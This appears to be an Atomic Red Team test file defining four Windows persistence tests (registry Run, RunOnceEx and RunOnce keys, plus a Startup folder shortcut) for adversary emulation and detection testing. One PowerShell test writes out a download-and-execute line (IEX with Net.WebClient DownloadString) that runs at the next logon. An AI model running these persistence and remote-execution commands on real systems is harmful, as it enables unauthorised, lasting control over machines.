Michael Haag
7bc7660f4f
* Discovery and Cleanup * Generate docs from job=validate_atomics_generate_docs branch=Discovery * mv discovery.bat * Fixed Discovery.bat URLs Updated Techniques with new location of discovery.bat * Generate docs from job=validate_atomics_generate_docs branch=Discovery
83 lines
2.4 KiB
YAML
83 lines
2.4 KiB
YAML
---
|
|
attack_technique: T1060
|
|
display_name: Registry Run Keys / Start Folder
|
|
|
|
atomic_tests:
|
|
- name: Reg Key Run
|
|
description: |
|
|
Run Key Persistence
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
command_to_execute:
|
|
description: Thing to Run
|
|
type: Path
|
|
default: C:\Path\AtomicRedTeam.exe
|
|
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
REG ADD "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /t REG_SZ /F /D "#{command_to_execute}"
|
|
REG DELETE "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /V "Atomic Red Team" /f
|
|
- name: Reg Key RunOnce
|
|
description: |
|
|
RunOnce Key Persistence
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
thing_to_execute:
|
|
description: Thing to Run
|
|
type: Path
|
|
default: C:\Path\AtomicRedTeam.dll
|
|
|
|
executor:
|
|
name: command_prompt
|
|
command: |
|
|
REG ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /d "#{thing_to_execute}"
|
|
REG DELETE HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnceEx\0001\Depend /v 1 /f
|
|
- name: PowerShell Registry RunOnce
|
|
description: |
|
|
RunOnce Key Persistence via PowerShell
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
thing_to_execute:
|
|
description: Thing to Run
|
|
type: Path
|
|
default: powershell.exe
|
|
|
|
executor:
|
|
name: powershell
|
|
command: |
|
|
$RunOnceKey = "HKLM:\Software\Microsoft\Windows\CurrentVersion\RunOnce"
|
|
set-itemproperty $RunOnceKey "NextRun" '#{thing_to_execute} "IEX (New-Object Net.WebClient).DownloadString(`"https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/ARTifacts/Misc/Discovery.bat`")"'
|
|
Remove-ItemProperty -Path $RunOnceKey -Name "NextRun" -Force
|
|
- name: Startup Folder
|
|
description: |
|
|
Add Shortcut To Startup via PowerShell
|
|
|
|
supported_platforms:
|
|
- windows
|
|
|
|
input_arguments:
|
|
thing_to_execute:
|
|
description: Thing to Run
|
|
type: Path
|
|
default: C:\Path\AtomicRedTeam.exe
|
|
|
|
executor:
|
|
name: powershell
|
|
command: |
|
|
$TargetFile = "$env:SystemRoot\System32\#{thing_to_execute}"
|
|
$ShortcutFile = "C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Notepad.lnk"
|
|
$WScriptShell = New-Object -ComObject WScript.Shell
|
|
$Shortcut = $WScriptShell.CreateShortcut($ShortcutFile)
|
|
$Shortcut.TargetPath = $TargetFile
|
|
$Shortcut.Save()
|